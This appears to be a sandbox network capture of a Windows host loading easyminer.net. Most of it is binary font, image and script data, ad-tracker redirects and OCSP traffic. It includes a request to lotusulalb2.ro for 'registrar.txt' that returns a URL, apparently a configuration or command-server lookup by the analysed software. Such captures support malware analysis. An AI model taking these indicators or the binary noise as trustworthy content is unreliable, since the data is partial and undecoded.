.....FL....0w.$,p.CIX.<....I.ª..J...1....c8.....{..h.......4:8q..
.....=/...V.?....<j....{._3r.X....)....R..r%,.g.2<(^...P.....x..
.B.:`...u.....:8...|....?.E..].w.0...7.jN........z..k..O.h...r...;m..&
gt;<.$>.^I.C.&./6I....wB.dal....L.26I....!D........u.....rl.,...
...@..$.{R.Ib..b...I.&I../.M.Y...6........&}.....0z.h..F.......f..LZ?.
..{.....#G..1j.....d.Du ....9"Uf..... ..x......&.|s...A.Q.A...q!..8.. 
-.;$U..:(.@.\(......._.....X......E.<..C.L.........o.C.... ........
6..S..j.>...n..1.....@..F.P....!V#.S...9......AI..>...6...;.RM..
R8..6E......p.....HX.}:s!...[.z.....3y..4......0..n.......Y.=.....?.b.
....}7"E..Ai..b.A...f.S./...y....................9"L^.N....B.)..B)...I
.8.W^(...;../.,.. z.=.....{:...........c........$.;...G.V............@
^..=..p...i...... ..Bt.:...@...}...).:.....!...A'........hb .11.3iz.G.
U.|....!.4:.gi....?k...i..h. .....|....i....s..o.....G.1.;d.....G..MR.
I....MR.I....f.$...KE.Nt.....8h.:..2..G.......6..*.G..$.:.}ih..i..<<< skipped >>>

GET /s/opensans/v14/RjgO7rYTmqiVp7vzi-Q5UT8E0i7KZn-EPnyo3HZu7kw.woff HTTP/1.1

Accept: */*

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Origin: hXXp://easyminer.net

Accept-Encoding: gzip, deflate

Host: fonts.gstatic.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Accept-Ranges: bytes

Content-Type: font/woff

Access-Control-Allow-Origin: *

Timing-Allow-Origin: *

Content-Length: 24132

Date: Wed, 14 Jun 2017 16:51:28 GMT

Expires: Thu, 14 Jun 2018 16:51:28 GMT

Last-Modified: Wed, 14 Jun 2017 16:46:28 GMT

X-Content-Type-Options: nosniff

Server: sffe

X-XSS-Protection: 1; mode=block

Cache-Control: public, max-age=31536000

Age: 3190452
wOFF......^D.......d........................GDEF.......(...(....GPOS..
..............GSUB.......X...t.[..OS/2.......[...`.5 .cmap...l........
....cvt ...L...Y.....M..fpgm............~a..gasp...D...........#glyf..
.T..Kd..v.Y.'.head..S....6...6..cphhea..S.... ...$....hmtx..T.........
....loca..W.............maxp..Y.... ... ....name..Y........\.53.post..
Zd..........Urprep..]T........C..................................4...6
.F..................x......P...s..I.....P* ..........<p8....|..O..4
..}... z}..[smkg.......{s.S...[..3..3.;..x.c`f..8.....u..1...<.f...
.................I.....................0.p.2E(00....x.n.R....iS...x.}.
%X.a....cqw.E;.k.[.z.A%..^.x............Wf.........d...0.P...c.[P.Au..
....?Wq57p3....I.$H..K..K..&E$.(.@L].~.c...?..`..n.^..P.../.e.......A.
.P]..x7.. @....Y........................#.....t6\.ea..X.*.......lb...M
..H....N..x.c.a.g.c..$KY...e@.,.."..........?....%.g....Z.....(".o..Y.
.Bu342.e......0..........M=.....x.uTGw.F.........)..)7..W.$`*.......G.
.Kz.)e....t.|.1.7....s.g....3.7mgf..~{1...s.3.S...co..o.~.Zy..u...kW.\
.t.....N.KG............K{..L:548..gqV..#.......C\/..?...K>...X =.G.
^7..(".#1Q...zd.......z.....u....V....3...j...5.....(yR\.<LU.Z.c.QC
.....l....L...L..,Ix.6.~.&7.u...X,.. ..~...3..9...K...j.bU....8dB.u]:.
.I......Rt".. .;..b.U}.R.b.........a:.*......ul..g.QJ..E.....8....H.A.
..}.E...g.._N@.V*...H....%.6.$.S.>..MK....t0....5...s.`v....-.*....
B.[.^v.B.f.E4........6l.<.D.6gd[.l..b...!Z.f.u....iv..{...fN*./...O
.....D............. ......>.].80....q.....l...~.:...^q.(.....u&<<< skipped >>>

GET /uploads/site_logo.png HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: easyminer.net

Connection: Keep-Alive

Cookie: INTELLI_90833303d1=9dd599517f1317a5a76366f195a0443d


HTTP/1.1 200 OK

Cache-Control: public, max-age=31536000,public, must-revalidate, proxy-revalidate

Expires: Sat, 21 Jul 2018 15:05:39 GMT

Last-Modified: Wed, 19 Apr 2017 04:25:02 GMT

Content-Type: image/png

Content-Length: 19125

Date: Fri, 21 Jul 2017 15:05:39 GMT

Accept-Ranges: bytes

Server: LiteSpeed

Pragma: public

X-Powered-By: W3 Total Cache/0.9.3

Connection: Keep-Alive
.PNG........IHDR...q...q......~L...J|IDATx....p........c..8....e..v../
3333333..}...-s.4M.0.eK:.e...h2..W3.9..&.....l........C..0.....3o...{.
....p&A Q..N..5.#...R...e .XH'..kBUrc.84.YS......`..q...........{.....
<....67..?..Z..]L 6.=.$.H.3....h.d.:(1UJ.......88...RI.....}..QU..B
3.L.....^s.99eO....G..?.?;i.}..,%....(.k...F....M.....H:=.F0.......P.r
=%......#%..J.VQ....R<(...&q..Ni.B..]r.U9.V......';Jw_.vV7.`....!T.
..6.5Y..."..b...U.. p..ArA.(5Y........9.J.@.a.D...H....\.[.xD..n.../. 
u7.9j.d.U.../..........I.~............P..2....h:L..* .'.PH..).)...s9..
..|.r..m.q....QJ"PhB....S'.2..M......C..!..UT...-.Z.)&..e..;R...c..._.
.t?..-..]/..?._...m..vE.......^.n\.x3..|-9?M8,.e.%....D...b.....A....v
.Ms.....>U...nj..@.PJ!].t$N..b9.K.m.E:.M...L..0...J..GttM.tA*..`...
8...[......|......_;>.......K..{.....i........G..=#.......F..* ..B.
.6..Q......&?>..U.'...........e..M...C.R..ZUT.u....|...Ev.Dv.L.r...
..a2..I\.Cg....$*..m.J...-.....v.....><...K....`D.)..G..9KV._...
"........x...B.(%)LL.{.0=...'......1..c..!LSG@.D.<8....q..?....p..R
.ft..P_...2..h..ln....'...@..`;!.8...D...v.......).cu.o........v<..
.^..,9..E..sn.3K....x.H.2..O....v.$..iY...5I.&...P.%.'U..f.E....3k....
.(...Rjj...,....Ji,.d....L.]...@-2<.rI.N..Wc..?....-...n.......9..?
4..7#....?>2......Û..C.L....rp....;.4...Z=..Q.]CI.....O....Dp.*2.
.@T. ....(.........%..\.c..}....:...hh...:.C...l.0:.U.......u.]7.O...S
.....w&i{..}...$...7.._x..j.(..UF.&....y3.=.h..f....d.....H....b..@..F
d.,.:...'hX..k`/..]M..O....BP...!.J?..@..O.....s.H..<f8...M..j.<<< skipped >>>

GET /tmp/cache/intelli.config.en.js?fm=1499849052 HTTP/1.1

Accept: application/javascript, */*;q=0.8

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: easyminer.net

Connection: Keep-Alive

Cookie: INTELLI_90833303d1=9dd599517f1317a5a76366f195a0443d


HTTP/1.1 200 OK

Cache-Control: public, max-age=31536000,public, must-revalidate, proxy-revalidate

Expires: Sat, 21 Jul 2018 15:05:39 GMT

Last-Modified: Wed, 12 Jul 2017 08:44:12 GMT

Content-Type: application/x-javascript

Content-Length: 1245

Content-Encoding: gzip

Vary: Accept-Encoding

Date: Fri, 21 Jul 2017 15:05:39 GMT

Accept-Ranges: bytes

Server: LiteSpeed

Pragma: public

X-Powered-By: W3 Total Cache/0.9.3

Connection: Keep-Alive
...........Vmo.6.. .>.6.8v.l@.vh.....A_>..A..e..H...hm....$.t...
1y....O.DUUz&.)...b_.X.*{.m...(|...Z..x..1..........Q~fT\..)...q;.Dj.B
?.x..6.&}...V..j. .K.H....W. ...!u.<sf3`.x.0u....4pT../3e.s#6......
y.j.....2.M...by.^.._.o...^ ..h...y.(.g..x.(....B4U...v..r.\%Z^(......
.tY.0..~.G......Tr...y.r...ET..q.j.xD....A8.b[.%.e0..\{%#'...... ...l.
.x.T"I[;.B._.9.TzS..}.F$.B........br^*..si.>.{...r.0v....{.QG1..j.&
gt;~z...cc..99;{..Ks......:.j.E......w.e..Qx...P.|5..}c..K....kB9~....
..M.h1}...../.M_L...|.@P.....4."...'|.#...1...<..#..f<a_.N...h..
..V&..W..m..6.u..&.`.Q4.;.1....X...Q..H./A...?.b> ..G<....0.....
..........Ob.....(....|......m.&.......)u....=.}2.\^......... .J..$.vg
.M.{p.k4.......18....*'-....g.]..'...|.]."E.W.I..x=C..,)..........9..&
lt;..oo]...U...?.....a.2&. 1.:..u4..t41......a.......J...).&....O....m
.........{/(.e.1a.0.W.B.....}.b...........<..=B*..1...*.c.ya...TU..
I*...)(.L...1G.'8.M..f.]s*._..y..B.].....n..{U..A]G.5...~Sa....!u"V@..
.6.]K.....@tjP.j]...........|d.'......?.)...y...3.N.A..Y.....[...Jg.0.
..r.......tg;.-.1.<...6nM..a.B.]..........0H.).7.s.:.5..ivM?......f
?...~.q.uX...^..8..[...;...p#..?.,.&....}.=...........1aCH............
.[Mn.~f7...-..eka.......l.x..H......}4j.*E..l..............l.\x.|.ODu.
......?.V./...aA.........
<<< skipped >>>

GET /js/bootstrap/js/bootstrap.min.js?fm=1491181282 HTTP/1.1

Accept: application/javascript, */*;q=0.8

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: easyminer.net

Connection: Keep-Alive

Cookie: INTELLI_90833303d1=9dd599517f1317a5a76366f195a0443d


HTTP/1.1 200 OK

Cache-Control: public, max-age=31536000,public, must-revalidate, proxy-revalidate

Expires: Sat, 21 Jul 2018 15:05:40 GMT

Last-Modified: Mon, 03 Apr 2017 01:01:22 GMT

Content-Type: application/x-javascript

Content-Length: 16998

Content-Encoding: gzip

Vary: Accept-Encoding

Date: Fri, 21 Jul 2017 15:05:40 GMT

Accept-Ranges: bytes

Server: LiteSpeed

Pragma: public

X-Powered-By: W3 Total Cache/0.9.3

Connection: Keep-Alive
...........}....y....L...v...r..0...$.^kwI.RV..#..4.... ..rgFeK.... ..
RqU*.;I.v....Z..b.u.z.T~Q.*.......4....Ut.....;....;{.l}..J...t.X..Y..
.......h........k.Z..y.J.......hY...p..?..=|R,..<..9....[E/.,.~m5..
...o>.F..j........Iw..........l....z...w..G].}....jiPL.~..,.....v.s
.|......Oj..I..|>...7..E.g...{.y1[....U1..Z/i...V....N.Y."Y-...P...
..l^.v..`.:}D....q..'..q..bO-4..u.........../\^.t:.j{.....?...On.|....
....Y;h}.uP..k#.@>O.Wu.B.y.6.Z.....e....:.'.Vo.g...8..z.."i.......Y
.|8.&....N...........a...........?.jmZ*.....M.\....4.^.............:X.
...8?..4..r5.\.J....Cy.up.......p4........:[.i.......N....$.x.Q.$u5...
...`..}.x.y......k8..u.u5.M.K.18.0..........|.Z....Hi.WiV.:.j...M.>
lo...1-.b...l.*M.s.-&...U...hxi?..C..3K..I....P.QY.ZV.....4..*....nK*.
....y ...O.{.....F[..........!. [y....d...2.y...g.........;<..\{..D
q.2.F.....=q.no....V/...=....sL.7....X,:.tr......p........%i.....O.9P.
...{.....w:...$....{....|.._...wo.......e6...D4.~..uZ..:.[.|I.......&g
t;P........y]f.;..:y [.A.y...............e..lo...l....^...Q..._y.q....
^.$..LC.?h...]....n>.V.%.}.....r...........R..xD.... .bJ..@.......$
........8[,.I1...........b...'......k...Q.r..m.......&..8s..v....o..N.
...r:.....)>..OK..~...:.#9.'.Tt`.}..f.!....?..}.iy..wiw.\NiY..d.=..
...@XC.w.......A.;x9...9*w...<..m..-.... ~..n#...w.~..i.5.Hb......t
F.s.u.?X.../..^...7n.........b..4.....\...v.....K..h...C..J.a..m.~..wK
@|.....r....P..u...V }G..l.....|.ng`.v..$4.$....N.v2.-...6h.W..8?....o
.h..<.i1...A;....A<........W....v $.........*..^...&]Q....s.<<< skipped >>>

GET /modules/eu_cookie/templates/front/css/divascookies_style_dark_bottom.css?fm=1488863724 HTTP/1.1

Accept: text/css

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: easyminer.net

Connection: Keep-Alive

Cookie: INTELLI_90833303d1=9dd599517f1317a5a76366f195a0443d


HTTP/1.1 200 OK

Cache-Control: public, max-age=31536000,public, must-revalidate, proxy-revalidate

Expires: Sat, 21 Jul 2018 15:05:40 GMT

Last-Modified: Tue, 07 Mar 2017 05:15:24 GMT

Content-Type: text/css

Content-Length: 246

Content-Encoding: gzip

Vary: Accept-Encoding

Date: Fri, 21 Jul 2017 15:05:40 GMT

Accept-Ranges: bytes

Server: LiteSpeed

Pragma: public

X-Powered-By: W3 Total Cache/0.9.3

Connection: Keep-Alive
............Mj.0....)..38.Ih......W......8.(.....IJ.n.6.......2.......
Lt4..p..f.........^i4z.FY..<.#...S...<....../...*F.uYm..,..E<
.....r]......;..!.m../m>.]C.....xW..;.....T.DU......S......\i...M.I
6.dY....~.n|.....O.......G..(~..4np..i./q.......HTTP/1.1 200 OK..Cache
-Control: public, max-age=31536000,public, must-revalidate, proxy-reva
lidate..Expires: Sat, 21 Jul 2018 15:05:40 GMT..Last-Modified: Tue, 07
 Mar 2017 05:15:24 GMT..Content-Type: text/css..Content-Length: 246..C
ontent-Encoding: gzip..Vary: Accept-Encoding..Date: Fri, 21 Jul 2017 1
5:05:40 GMT..Accept-Ranges: bytes..Server: LiteSpeed..Pragma: public..
X-Powered-By: W3 Total Cache/0.9.3..Connection: Keep-Alive............
..Mj.0....)..38.Ih......W......8.(.....IJ.n.6.......2.......Lt4..p..f.
........^i4z.FY..<.#...S...<....../...*F.uYm..,..E<.....r]...
...;..!.m../m>.]C.....xW..;.....T.DU......S......\i...M.I6.dY....~.
n|.....O.......G..(~..4np..i./q...........


GET /templates/kickstart/fonts/fontawesome-webfont.eot? HTTP/1.1

Accept: */*

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Origin: hXXp://easyminer.net

Accept-Encoding: gzip, deflate

Host: easyminer.net

Connection: Keep-Alive

Cookie: INTELLI_90833303d1=9dd599517f1317a5a76366f195a0443d


HTTP/1.1 200 OK

Cache-Control: public, max-age=31536000,public, must-revalidate, proxy-revalidate

Expires: Sat, 21 Jul 2018 15:05:40 GMT

Last-Modified: Mon, 17 Apr 2017 21:12:48 GMT

Content-Type: application/vnd.ms-fontobject

Content-Length: 165742

Date: Fri, 21 Jul 2017 15:05:40 GMT

Accept-Ranges: bytes

Server: LiteSpeed

Pragma: public

X-Powered-By: W3 Total Cache/0.9.3

Connection: Keep-Alive

n.................................LP........................Yx........
..............F.o.n.t.A.w.e.s.o.m.e.....R.e.g.u.l.a.r...$.V.e.r.s.i.o.
n. .4...7...0. .2.0.1.6.....F.o.n.t.A.w.e.s.o.m.e................PFFTM
k.G.........GDEF.......p... OS/2.2z@...X...`cmap..:.........gasp......
.h....glyf...M......L.head...-.......6hhea...........$hmtxEy..........
loca...\........maxp.,.....8... name......gh....post......k....u......
....xY_.<..........3.2.....3.2.....................................
............................'...............@.........i.........3.....
..3...s................................pyrs.@. .......................
.... .....p.....U.............................................].......
........................................y...n.........................
..............2.......................................@...............
......................................................................
..............................................................z.......
............................Z.........................................
..@.......5...5.......................z...............................
....................Z...Z...................@.........................
......................................................................
........,..._...........................@.............................
..............................................s.......................
............................@...............................@.........
..........................(.......................................

<<< skipped >>>

GET / HTTP/1.1

Accept: text/html, application/xhtml xml, */*

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: easyminer.net

Connection: Keep-Alive


HTTP/1.1 200 OK

Set-Cookie: INTELLI_90833303d1=9dd599517f1317a5a76366f195a0443d; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Set-Cookie: INTELLI_90833303d1=9dd599517f1317a5a76366f195a0443d; expires=Fri, 21-Jul-2017 15:35:39 GMT; path=/

Content-Type: text/html

X-Powered-CMS: Subrion CMS

Transfer-Encoding: chunked

Content-Encoding: gzip

Vary: Accept-Encoding

Date: Fri, 21 Jul 2017 15:05:39 GMT

Accept-Ranges: bytes

Server: LiteSpeed

Connection: close
197c.............]ys.....W...I....Y.c.....{qBa..T.7..zf.5...l...w.....
.....S!......sN..[.'..~u...#6....R.~X.F....j....Z....%.?..w}uI.K..,...
e..M...ky.svu..x.e..........O...x..Y..y.yq...m.....}n...,..o.!g.A.D}..
.$..8....>g..3....pG..j0.]...~...K.$.b.^1.=.|.U.......W.<..E...U
."........;.f...,pCGxn..[3.....n..Vo'y7......s.....I...g.......}>..
..Hd|8..4....JA...E ..0./f.... s.^.m.[.wGv.. 8...._#..k4h............=
q.........`...g..H..........yB.gqOW..D......\.G.....8%.....A....a.>
.%.j..0.z.L.8c!.C........./[....Q.....u..............l....Y......w..A.
3.b..0..X......I^...._...G}........wz..7........r.B.|.D.J.O.8.i6....=.
..Q.Kk.hK.......;.Nf.5..5t..Gm.9.(.b.9xXQ.8f.RI.f\4...Ldn.5<!.....Q
Y.&u.....[.......[;x...%.<u..i......}.A....m.=7.F....E4.......5J...
Z.]....Qx....,......bK....]..E9...........#............06 ._.....Z...w
c.....b..@.;....k*..9.u...Qvi..%.%.......i...>r.1...U...{X.X.....^.
.............L.....Z.......h....3)*. ...MN.^v.....V.2. -E.F.c.s...A...
..bL3...Tx.0..~.... .[...N.Ykcs}........F...6*.Tu..N..Z. t...}..C..V2.
.D..AU....=.bXN.".4..2f.=.Qto..x`.._....aG..B.....e.9.<....{.]U.xR/
.>.v....O..x.....k5..6.b..J).Y....G..i.|..~|.Ut1.7%;.e......%......
)g...]7%.....=7...oE.%..r.m.g....3et..cU.X6J`...B.........$..Dp......z
._3..c7.....n]..i.:..r...~.....X...oE......X9U......-.....-.lwA..nHct.
s....f..B..W....H.....a.8N0...p..:.....1.2A..........D...A......I.7.j.
...@...#.:.B.}.. .q..>E....v/N.. . F_`. ..E...,.wSoP....Q@X...j.aiM
6.^:..._.S)..\...i:.jV0.|.5(.Q.DI.9.4.. ..Z.eu.V./.D.....S.f...4.U<<< skipped >>>

GET /easyminer/registrar.txt HTTP/1.1

Connection: Keep-Alive

Host: lotusulalb2.ro

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36


HTTP/1.1 200 OK

Cache-Control: public, max-age=3600,public, must-revalidate, proxy-revalidate

Expires: Fri, 21 Jul 2017 16:05:38 GMT

Last-Modified: Mon, 21 Dec 2015 12:11:41 GMT

Content-Type: text/plain

Content-Length: 31

Date: Fri, 21 Jul 2017 15:05:38 GMT

Accept-Ranges: bytes

Server: LiteSpeed

Pragma: public

X-Powered-By: W3 Total Cache/0.9.3

Connection: Keep-Alive

%hXXp://openradiodirectory.com/..

GET /ping_match.gif?st=EYEOTA&rurl=http://ps.eyeota.net/match?bid=9sn4omv&uid=_wfivefivec_&newuser=1 HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: i.w55c.net

Connection: Keep-Alive


HTTP/1.1 302 Found

Cache-Control: no-cache, must-revalidate

Date: Fri, 21 Jul 2017 15:05:46 GMT

Expires: Fri, 01 Jan 1990 00:00:00 GMT

Location: hXXp://ps.eyeota.net/match?bid=9sn4omv&uid=Ru2Z2hPj1DyzuX5&newuser=1

P3P: policyref="hXXps://cts.w55c.net/ct/p3p_policy_ref.xml", CP="UNI PUR COM INT STA OTC STP OUR CUR TAIo COR DSP NOI"

Pragma: no-cache

Server: PixelTracking/v2.0.30-140-g6586afd#rel-ec2-master i-066e0c89469c51851@eu-central-1b@dxedge-app_eu-central-1_prod_asg

Set-Cookie: wfivefivec=Ru2Z2hPj1DyzuX5; Domain=.w55c.net; Expires=Tue, 21-Aug-2018 15:05:47 GMT; Path=/

Content-Length: 0

Connection: keep-alive

HTTP/1.1 302 Found..Cache-Control: no-cache, must-revalidate..Date: Fr
i, 21 Jul 2017 15:05:46 GMT..Expires: Fri, 01 Jan 1990 00:00:00 GMT..L
ocation: hXXp://ps.eyeota.net/match?bid=9sn4omv&uid=Ru2Z2hPj1DyzuX5&ne
wuser=1..P3P: policyref="hXXps://cts.w55c.net/ct/p3p_policy_ref.xml", 
CP="UNI PUR COM INT STA OTC STP OUR CUR TAIo COR DSP NOI"..Pragma: no-
cache..Server: PixelTracking/v2.0.30-140-g6586afd#rel-ec2-master i-066
e0c89469c51851@eu-central-1b@dxedge-app_eu-central-1_prod_asg..Set-Coo
kie: wfivefivec=Ru2Z2hPj1DyzuX5; Domain=.w55c.net; Expires=Tue, 21-Aug
-2018 15:05:47 GMT; Path=/..Content-Length: 0..Connection: keep-alive.
.

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCECdm7lbrSfOOq9dwovyE3iI= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.usertrust.com


HTTP/1.1 200 OK

Date: Fri, 21 Jul 2017 15:06:03 GMT

Server: Apache

Last-Modified: Wed, 19 Jul 2017 10:05:35 GMT

Expires: Wed, 26 Jul 2017 10:05:35 GMT

ETag: E2E33469C91C0EA098DCB64B1E0B7F6202E88797

Cache-Control: max-age=413371,public,no-transform,must-revalidate

X-OCSP-Reponder-ID: rmdccaocsp31

Content-Length: 471

Connection: close

Content-Type: application/ocsp-response

0..........0..... .....0......0...0.........z4.&...&T....$.T...2017071
9100535Z0s0q0I0... ........|.fT...D.b&...e{.z.......z4.&...&T....$.T..
.'f.V.I....p...."....20170719100535Z....20170726100535Z0...*.H........
.....e..I.$}.oo.\..:.E.%.....k.BBS.'.......1.....X ....w.|......UW....
.....sZ.....&..9Ga.pU..Z...1.E.d...ZS....k....... ..3....... =0s.c?i2p
c.4Hmi....z.o.....?M..d..!T...Ji....Fc..Ms.W...X...=........}.......O.
..w.Tc.ke.jvY..-...Yz.f.J..x..7@k.EL.~..6@...<!..gp..

GET /cms?partner_id=Eyeot HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: cms.analytics.yahoo.com

Connection: Keep-Alive


HTTP/1.1 302 Found

Date: Fri, 21 Jul 2017 15:05:57 GMT

Content-Type: text/html;charset=utf-8

Location: hXXps://ps.eyeota.net/match?bid=bhc9gd0&yahoo_ver=2&yahoo_id=rExagkl8O5bm_MYoIHUf_1ZzZZy3xCUp4B1Azg--

Content-Length: 0

Server: ATS

Age: 0

Connection: keep-alive

Set-Cookie: B=5jqvakpcn462l&b=3&s=d0; expires=Sat, 21-Jul-2018 15:05:57 GMT; path=/; domain=.yahoo.com
HTTP/1.1 302 Found..Date: Fri, 21 Jul 2017 15:05:57 GMT..Content-Type:
 text/html;charset=utf-8..Location: hXXps://ps.eyeota.net/match?bid=bh
c9gd0&yahoo_ver=2&yahoo_id=rExagkl8O5bm_MYoIHUf_1ZzZZy3xCUp4B1Azg--..C
ontent-Length: 0..Server: ATS..Age: 0..Connection: keep-alive..Set-Coo
kie: B=5jqvakpcn462l&b=3&s=d0; expires=Sat, 21-Jul-2018 15:05:57 GMT; 
path=/; domain=.yahoo.com..

GET //MEIwQDA+MDwwOjAJBgUrDgMCGgUABBQUwPiEZQ6/sVZNPaFToNfxx8ZwqAQUfAwyH6fZMH/EfWijYqihzqsHWycCAQc= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.starfieldtech.com


HTTP/1.1 200 OK

Date: Fri, 21 Jul 2017 15:05:59 GMT

Server: Apache

Content-Transfer-Encoding: Binary

Cache-Control: max-age=118548, public, no-transform, must-revalidate

Last-Modified: Fri, 21 Jul 2017 13:45:47 GMT

Expires: Sun, 23 Jul 2017 01:45:47 GMT

ETag: "636520c5f482677ea2eb9bb7cfd91d251ecbfe6d"

P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"

Content-Length: 1781

Connection: close

Content-Type: application/ocsp-response
0..........0..... .....0......0...0......0..1.0...U....US1.0...U....Ar
izona1.0...U....Scottsdale1%0#..U....Starfield Technologies, Inc.110/.
.U...(Starfield Root Validation Authority - G2..20170721134547Z0d0b0:0
... ............e...VM=.S.....p...|.2...0..}h.b.....['.......201707211
34547Z....20170723014547Z0...*.H..............k.........z....@...>l
.K2{`Dl.Z..0......Rc......j.5]._..f..."].P/.CK=......N..t...<...&.N
.v&.Y..j....D..x....".TI>.."Awk.a...........-.\e.Tm...90.$.gm..A.`.
..F.9...q..% ......o8.......H.L.n..$(.*C.:.x.g.x...&.P.:.....f =f...&.
..s]{.Q...m.Y.lM..Ht.f......UB....0...0...0............*.rO5.f0...*.H.
.......0..1.0...U....US1.0...U....Arizona1.0...U....Scottsdale1%0#..U.
...Starfield Technologies, Inc.1200..U...)Starfield Root Certificate A
uthority - G20...161213070000Z..171213070000Z0..1.0...U....US1.0...U..
..Arizona1.0...U....Scottsdale1%0#..U....Starfield Technologies, Inc.1
10/..U...(Starfield Root Validation Authority - G20.."0...*.H.........
....0.............}...@.H..........j.b.2.c....'eSA.....6""2.hf.m.m9...
....._N."gV..{.J"{..0f.W$.Xr....|U.F.!.K.0 .(p......9.I......c.c\.9.xt
.v.UN...%....,R....ZJ......rz.Z..p...ru.6.....0..t....*...T.W.....?...
X...( ..z.[. .A... z.[>-.y>...nvU...g.wU........ Fh.6F...}......
....0..0...U.......0.0...U...........0...U.%..0... .......0...U.......
.J!~...}....^].....0... .....0......0F..U...?0=0;.9.7.5hXXp://crl.star
fieldtech.com/repository/sfroot-g2.crl0P..U. .I0G0E..`.H...n....0604..
 ........(hXXp://crl.starfieldtech.com/repository/0...*.H.........<<< skipped >>>

GET /5/ct=y/c=3825/tp=DTSC/tpid=2DE7B66B4518725926432CB1022296DF HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: bcp.crwdcntrl.net

Connection: Keep-Alive

Cookie: _cc_cc=ctst


HTTP/1.1 200 OK

Cache-Control: no-cache

Content-Type: image/gif

Date: Fri, 21 Jul 2017 15:05:42 GMT

Expires: Thu, 01 Jan 1970 00:00:00 GMT

P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV

Pragma: no-cache

Set-Cookie: _cc_aud="ABR4nGNgYGCILJJwZYABFgYGrhkgBuNsT7DAolYw72E9kAQAZAoFPA==";Version=1;Path=/;Domain=crwdcntrl.net;Expires=Tue, 17-Apr-2018 15:05:41 GMT;Max-Age=23328000

Set-Cookie: _cc_cc="ACZ4nGNQMEsyMTBIszC1NEo1MDexSDM2TDW3MDFKMTFPMrY0N01lAILIIglXBjjg33VQl/GjLMN/RkaGnQjmm4b7AjD2oy+WcOHz6jDmuaOHmGHs3k1TWGDs/acfscHYhxfPgYu/RmJfP4VQcwmJ/QHJ1k1/CmHMd0jCAJCtSLQ=";Version=1;Path=/;Domain=crwdcntrl.net;Expires=Tue, 17-Apr-2018 15:05:41 GMT;Max-Age=23328000

Set-Cookie: _cc_id=6b400f8592e0748f31e7842d47b3975e;Path=/;Domain=crwdcntrl.net;Expires=Tue, 17-Apr-2018 15:05:41 GMT

Set-Cookie: _cc_dc=1;Path=/;Domain=crwdcntrl.net;Expires=Tue, 17-Apr-2018 15:05:41 GMT

X-Server: 172.25.10.191

Content-Length: 49

Connection: keep-alive
GIF89a...................!.......,...........T..;HTTP/1.1 200 OK..Cach
e-Control: no-cache..Content-Type: image/gif..Date: Fri, 21 Jul 2017 1
5:05:42 GMT..Expires: Thu, 01 Jan 1970 00:00:00 GMT..P3P: CP=NOI DSP C
OR NID PSAa PSDa OUR UNI COM NAV..Pragma: no-cache..Set-Cookie: _cc_au
d="ABR4nGNgYGCILJJwZYABFgYGrhkgBuNsT7DAolYw72E9kAQAZAoFPA==";Versi
on=1;Path=/;Domain=crwdcntrl.net;Expires=Tue, 17-Apr-2018 15:05:41 GMT
;Max-Age=23328000..Set-Cookie: _cc_cc="ACZ4nGNQMEsyMTBIszC1NEo1MDexSDM
2TDW3MDFKMTFPMrY0N01lAILIIglXBjjg33VQl/GjLMN/RkaGnQjmm4b7AjD2oy+
WcOHz6jDmuaOHmGHs3k1TWGDs/acfscHYhxfPgYu/RmJfP4VQcwmJ/QHJ1k1/C
mHMd0jCAJCtSLQ=";Version=1;Path=/;Domain=crwdcntrl.net;Expires=Tue, 
17-Apr-2018 15:05:41 GMT;Max-Age=23328000..Set-Cookie: _cc_id=6b400f85
92e0748f31e7842d47b3975e;Path=/;Domain=crwdcntrl.net;Expires=Tue, 17-A
